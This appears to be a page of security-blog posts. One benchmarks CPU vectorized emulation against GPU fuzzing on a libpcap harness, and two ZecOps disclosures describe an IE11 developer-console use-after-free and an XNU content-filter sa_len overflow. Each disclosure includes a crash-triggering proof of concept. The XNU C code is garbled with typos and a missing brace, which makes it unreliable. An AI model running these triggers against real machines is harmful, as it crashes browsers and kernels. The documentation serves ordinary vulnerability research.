        let elapsed = time.elapsed().as_secs_f64();

        print!("{:14.2} packets/second\n", ITERS as f64 / elapsed);
    }
}

We’re just going to compile the filter they mention in their blog, and then call bpf_filter_with_aux_data in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using libpcap-1.9.1 as distributed as a source code zip, this may differ slightly from their version.

pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
    Finished release [optimized] target(s) in 0.01s
     Running `target/release/harness`
   18703628.46 packets/second

Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.

This unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.

Trying to make the comparison closer

I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. It’s important to note, from this point on, this comparison is for myself. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance. I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.

So, to start off, I’m going to compare the GPU fuzzer against my vectorized emulation. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.

Vectorized emulation entirely contains only my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and make rapid changes to internals when needed. But, it also means, my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.

Let’s try it!

The environment

To try to get as close to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there’s no specifics about what they used as an input, so we’re making the assumption that a 1500-byte zeroed out input and simply invoking bpf_filter_with_aux_data, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Due to how many or conditions are used in the filter, and given the packet doesn’t match any, should mean we’re seeing the worst case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was 1.2.3.4, I’d suspect the performance would be improved. Without this being clarified from the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).

Anyways, the target code that I’m using is as such:

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

#[no_mangle]
pub extern fn fuzz_external() {
    const ITERS: u64 = 1;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0x41u8; 1500];

		// Filter a packet
		bpf_filter_with_aux_data(
			program.bf_insns,
			buf.as_ptr(),
			buf.len() as u32,
			buf.len() as u32,
			std::ptr::null()
		);
    }
}

fn main() {
    fuzz_external();
}

This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of bpf_filter_with_aux_data, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.

Further, I will add another breakpoint on the return site of bpf_filter_with_aux_data to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing buf), and otherwise bubbling up to an exit() syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only bpf_filter_with_aux_data is executing, and once it is not, the VM is reset and run again.

My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).

Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core c2-standard-60 (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Project to try to apples-to-apples as best I can. This machine costs $3.1321/hour, and thus, we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.

Here… we… go!

image

Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.

We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up with ideally what we want. The emulator is scaling linearly as cores are added, until we start getting past 30 cores, where they become hyperthreads and they’re not actually physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!

Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, and nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped out code being jumped over.

Next, we have the light blue line, which at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte-level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This of course, has a performance cost. And this is the real line, there’s no way I’d ever run a fuzzer without permission checks as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.

Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation wastes. That being said, we’re not mutating, so it doesn’t really matter, we’re just looking at the runtime costs of this instrumentation.

Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core c2-standard-60 machine.

Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about 79.8 million iters/second/dollar/hour.

I don’t have access to their GPU code so I can’t reproduce it, but their number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.

This gives vectorized emulation about a 3x advantage for performance per dollar compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.

Where does this leave us?

I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.

GPUs have some major memory limitations, that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all modified memory by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero CVE-2020-15999, and I’m pusing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target, I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.

Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reduce the number of threads. There’s definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).

Is there more perf?

It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down, this makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in our native libpcap harness mentioned early on, 5.5M with ours). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?

Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.

Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.

This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target, compared to libfuzzer performing orchistration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.

But wait… what even are these dollar amounts?

So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.

But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.

The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Project. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?

Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.

But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.

For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.

For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Lets just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Lets just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs ram and call it “even”.

Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.

Well, how does it stack up?

I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking), this is a common mode for when I’m not fuzzing too deep on a target. Well, lets light up those cores.

lolcores

Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.

Well, we’re getting about 700 million fuzz cases per second on the whole system. Woo! That’s a shitton! That is 77k iters/second/$. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one time dollar investment, not a per-hour cloud fee.

So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.

What gives? Well, the CPUs will definitely use more power, at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, when including peripherals and others. The Tesla T4 is 70W each, totalling 280W. This would likely be in a system which would be about 200W to run the CPU, chassis, RAM, etc, so lets say 500W. Well, it’d be about 1/2 the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major, for me, I pay $0.10/kWh, thus the CPU server would cost about $0.20 per hour, and the GPU build would cost about $0.10 per hour (doubled for cooling). These are my “cloud compute” runtime costs, and thus the GPUs are still about 10x more expensive to run than the CPU solution.

Conclusion

As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.

There’s a pretty large discrepency in the cost effectiveness of GPUs in the cloud, and this blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blogs tests (quad-core Skylake @ $200 or so vs a NVIDIA T4 @ $2000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!

Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.

But! The GPU solution (as well as vectorized emulation) allow for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown, than not being able to fuzz it at all (eg. needing source)!

Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.

I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!


Random opinions

I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.

Is not having syscalls a problem?

No. It’s not. It is for people who want to use the tool. But this is a research tool and is for exploring what is possible, the act of fuzzing on a GPU by running binary translated code is incredible, that’s the focus here! GPUs are turing complete, we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.

There’s also nothing preventing GPUs from being used to emulate an whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with making software TLBs these things can be manageable to a level it’s still worth doing!


Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Crash Reproduction Series: IE Developer Console UAF

13 October 2020 at 08:50
Crash Reproduction Series: IE Developer Console UAF

During a DFIR investigation, using ZecOps Crash Forensics on a developer’s computer we encountered a consistent crash on Internet Explorer 11. The TL;DR is that albeit this bug is not exploitable, it presents an interesting expansion to the attack surface through the Developer Consoles on browsers.

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant commands leading to a crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.

Responsible Disclosure

We reported this issue to Microsoft, that decided to not fix this UAF issue.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected]

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

8 October 2020 at 10:00
ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.

We see it in the news everyday: sophisticated threat actors can bypass all existing security defenses. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.

World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.

Supported versions:

  • Android 8 and above – until latest
  • iOS 10 and above – until latest

Supported HW Models:

  • All device models are supported on both Android and iOS.

ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.

.NET Grey Box Approach: Source Code Review & Dynamic Analysis

By: voidsec
7 October 2020 at 13:19

Following a recent engagement, I had the opportunity to check and verify some possible vulnerabilities on an ASP .NET application. Despite not being the deepest technical nor innovative blog post you could find on the net, I have decided to post it anyway in order to explain the methodology I adopt to verify possible vulnerabilities. […]

The post .NET Grey Box Approach: Source Code Review & Dynamic Analysis appeared first on VoidSec.

From a comment to a CVE: Content filter strikes again!

17 September 2020 at 02:44
From a comment to a CVE: Content filter strikes again!

0x0- Opening

In the past few years XNU had few vulns in a newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf) so it is no surprise that the combination of the newly added code and complex areas (content-filter) alongside with a funny comment caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not but it won’t hurt to run a quick search for those so we will use the magic tool CMD +f to search for memcpy calls and in less than two minutes you will find the following 

0x2- The bug.

The newly updated cfil_sock_attach function which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see that in (Part A) the function receives two sockaddrs parameters (local and remote) which are user controlled and then using their sa_len struct member (remote in (Part B) and local in (Part C)) in order to copy data to cfi_so_attach_laddr and cfi_so_attach_faddr. Parts (A) (B) and (C) were all result of a new changes in XNU.

So what’s the problem? The problem is there is lack of check of sa_len which can be set up to 255 and then will be used in a memcpy to copy data into a union sockaddr_in_4_6 which is a 28 bytes struct – resulting in a buffer overflow.

The PoC below which is almost identical to Ian Beer’s mptcp with two changes. This POC requires a pre-requisite to reach the vulnerable area. In order to trigger the vulnerability we need to use an MDM enrolled device with NECP policy, or attach the socket to a valid filter_control_unit. One way to do it is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char * argv[ ]) {

	int sock = socket(AF_INET, SOCK_STRAEM, IPPROTO,TCP);
	If (sock < 0) {
		printf(“socket failed\n”);
		return -1;
	}
	printf(“got socket: %d\n”, sock);
	struct sockaddr* sockaddr_dst = malloc(256);
	memset(sockaddr_dst, ‘A’, 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_faimly =AF_INET;
	sa_endpoint_t eps = {0};
	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
eps.sae_dstaddr = sockaddr_dst;
eps.sae_dstaddrlen = 255;
int err = connectx(sock,&eps,SAE_ASSOCID_ANY,0,NULL,0,NULL,NULL);
  printf(“err: %d\n”,err);
close(sock);
return 0;

0x3- Patch

The patch of the issue is interesting too because while the source code (iOS 13.6 / MacOS 10.15.6) provide this patch:

if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the mecmpy_chk is gone alongside the patch!

Did the original developer knew this function was vulnerable and placed it there as a placeholder until a proper patch? Your guess is good as ours.

Also note that the call to memcpy_chk before the real_mode_bootstarp_end (which is a wraparound of memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments they might give us valuable information
  2. Newly added code is oftentimes buggy
  3. Content filter code is complex and tricky 
  4. Now with Pangu’s recent blog post and Ian Beer mptcp bug we can learn that sockaddr->sa_len already caused multiple issues and should be audited a bit more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threats intelligence database, and saw no active attacks associated with this issue. We still advise to update to the latest version to receive all other updates.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486)

By: admin
11 September 2020 at 12:57

Summary

Assigned CVE: CVE-2020-4485 and CVE-2020-4486 have been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 13/05/2020

Exploit Code: N/A

